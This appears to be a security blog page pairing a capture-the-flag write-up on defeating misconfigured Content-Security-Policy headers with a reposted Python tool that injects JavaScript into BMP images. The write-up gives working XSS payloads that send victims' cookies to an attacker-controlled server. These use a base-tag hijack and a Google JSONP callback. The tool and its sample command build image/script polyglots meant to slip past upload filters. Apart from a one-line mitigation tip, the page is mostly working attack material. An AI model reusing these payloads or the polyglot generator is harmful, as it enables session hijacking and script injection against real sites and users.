CSP bypass with wargame

What is Content-Security-Policy (CSP)?

Conent Security Policy (CSP) is an added security layer that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injectino attacks.

However, it could be unsafe if there is wrong CSP configuration.

Below is a sample unsafe scenarios with wargame probs.

#1. Bypass CSP script-src 'nonce-random'.

First prob, there is CSP with script-src 'nonce-random' in HTTP header.

HTTP/1.1 200 OK
Date: Fri, 23 Apr 2021 22:01:38 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Security-Policy: script-src 'nonce-uMiBg4W3wGgp8JQnJG2TL7WLGE8=';
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 133
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

I tried CSS brute-force attack to take the nonce-random value, however, it did not work. I looked again source code of the prob. There was loaded internal script file "script.js" as per below:

<h2>you can inject anything</h2>
<div id="injected">
foo
</div>
<script nonce="" src="/script.js" umibg4w3wggp8jqnjg2tl7wlge8=""></script>

Yes! now I have a chance to load the script.js file from my server using <base> tag. It is because the CSP does not include base-uri.

I can steal an admin cookie with this Payload:

<base href='http://[my server IP]/'>

script.js in my server

location.href='http://[my server IP]'+cookie;

#2. Bypass CSP script-src "https://*.google.com"

Secode prob, there is CSP with script-src 'https://*.google.com'.

HTTP/1.1 200 OK
Date: Fri, 23 Apr 2021 22:52:02 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Security-Policy: script-src https://*.google.com/;
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 90
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

It allowed only google. Many websites use Google's API a lot. And Google always overlooks being safe. This problem is probably the wrong CSP setting, which can be seen a lot.

I bypassed this CSP with this payload:

<script src=https://accounts.google.com/o/oauth2/revoke?callback=var/**/a%3d%27http://[my server ip]%27;location.replace(a%252bcookie);></script>

As the payload, this vulnerability is using json callback on google.com.

How to mitigate this problem? It could solve to allow specific url for CSP. For example, script-src https://apis.google.com

~ kerz

Reference:

Conent Security Policy (CSP): https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP

Secure CSP: https://developers.google.com/web/fundamentals/security/csp

BMP INJECTION Python.

It helps to inject source to BMP.
If you need to test uploading BMP with javascript, you could use bmpinjection.py.

 #!/usr/bin/env python2  
 #============================================================================================================#  
 #======= Simply injects a JavaScript Payload into a BMP. ====================================================#  
 #======= The resulting BMP must be a valid (not corrupted) BMP. =============================================#  
 #======= Author: marcoramilli.blogspot.com ==================================================================#  
 #======= Version: PoC (don't even think to use it in development env.) ======================================#  
 #======= Disclaimer: ========================================================================================#  
 #THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR  
 #IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED  
 #WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE  
 #DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,  
 #INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES  
 #(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR  
                                 #SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)  
                                 #HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,  
 #STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING  
 #IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE  
 #POSSIBILITY OF SUCH DAMAGE.  
 #===========================================================================================================#  
 import argparse  
 import os  
   
 #---------------------------------------------------------  
 def _hexify(num):  
     """  
     Converts and formats to hexadecimal  
     """  
     num = "%x" % num  
     if len(num) % 2:  
         num = '0'+num  
     return num.decode('hex')  
   
 #---------------------------------------------------------  
 #Example payload: "var _0xe428=[\""+ b'\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64' + "\"]  
 #;alert(_0xe428[0]);"  
 def _generate_and_write_to_file(payload, fname):  
     """  
     Generates a fake but valid BMP within scriting  
     """  
     f = open(fname, "wb")  
     header = (b'\x42\x4D' #Signature BM  
          b'\x2F\x2A\x00\x00' #Header File size, but encoded as /* <-- Yes it's a valid header  
          b'\x00\x00\x00\x00' #Reserved  
          b'\x00\x00\x00\x00' #bitmap data offset  
          b''+ _hexify( len(payload) ) + #bitmap header size  
          b'\x00\x00\x00\x14' #width 20pixel .. it's up to you  
          b'\x00\x00\x00\x14' #height 20pixel .. it's up to you  
          b'\x00\x00' #nb_plan  
          b'\x00\x00' #nb per pixel  
          b'\x00\x10\x00\x00' #compression type  
          b'\x00\x00\x00\x00' #image size .. its ignored  
          b'\x00\x00\x00\x01' #Horizontal resolution  
          b'\x00\x00\x00\x01' #Vertial resolution  
          b'\x00\x00\x00\x00' #number of colors  
          b'\x00\x00\x00\x00' #number important colors  
          b'\x00\x00\x00\x80' #palet colors to be complient  
          b'\x00\x80\xff\x80' #palet colors to be complient  
          b'\x80\x00\xff\x2A' #palet colors to be complient  
          b'\x2F\x3D\x31\x3B' #*/=1;  
          )  
     # I made this explicit, step by step .  
     f.write(header)  
     f.write(payload)  
     f.close()  
     return True  
   
 #---------------------------------------------------------  
 def _generate_launching_page(f):  
     """  
     Creates the HTML launching page  
     """  
   
     htmlpage ="""<html>  
 <head><title>Opening an image</title> </head>  
 <body>  
 <img src=\"""" + f + """\"\>  
 <script src= \"""" + f + """\"> </script>  
 </body>  
 </html>  
 """  
     html = open("run.html", "wb")  
     html.write(htmlpage);  
     html.close()  
     return True  
   
 #---------------------------------------------------------  
 def _inject_into_file(payload, fname):  
     """  
     Injects the payload into existing BMP  
     NOTE: if the BMP contains \xFF\x2A might caouse issues  
     """  
     # I know, I can do it all in memory and much more fast.  
     # I wont do it here.  
     f = open(fname, "r+b")  
     b = f.read()  
     b.replace(b'\x2A\x2F',b'\x00\x00')  
     f.close()  
   
     f = open(fname, "w+b")  
     f.write(b)  
     f.seek(2,0)  
     f.write(b'\x2F\x2A')  
     f.close()  
   
     f = open(fname, "a+b")  
     f.write(b'\xFF\x2A\x2F\x3D\x31\x3B')  
     f.write(payload)  
     f.close()  
     return True  
   
   
 #---------------------------------------------------------  
 if __name__ == "__main__":  
     parser = argparse.ArgumentParser()  
     parser.add_argument("filename",help="the bmp file name to be generated/or infected")  
     parser.add_argument("js_payload",help="the payload to be injected. For exmample: \"alert(\"test\");\"")  
     parser.add_argument("-i", "--inject-to-existing-bmp", action="store_true", help="inject into the current bitmap")  
     args = parser.parse_args()  
     print("""  
 |======================================================================================================|  
 | [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal.     |  
 | It is the end user's responsibility to obey all applicable local, state and federal laws.      |  
 | Authors assume no liability and are not responsible for any misuse or damage caused by this program |  
 |======================================================================================================|  
 """)  
     if args.inject_to_existing_bmp:  
          _inject_into_file(args.js_payload, args.filename)  
     else:  
         _generate_and_write_to_file(args.js_payload, args.filename)  
       
     _generate_launching_page(args.filename)  
     print "[+] Finished!"  
   

 c:\Python27\python.exe bmpinject.py -i 1.bmp "var _0x9c4c=\"\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\"; function Msgbox(_0xccb4x3){alert(eval(_0xccb4x3));};Msgbox(_0x9c4c);"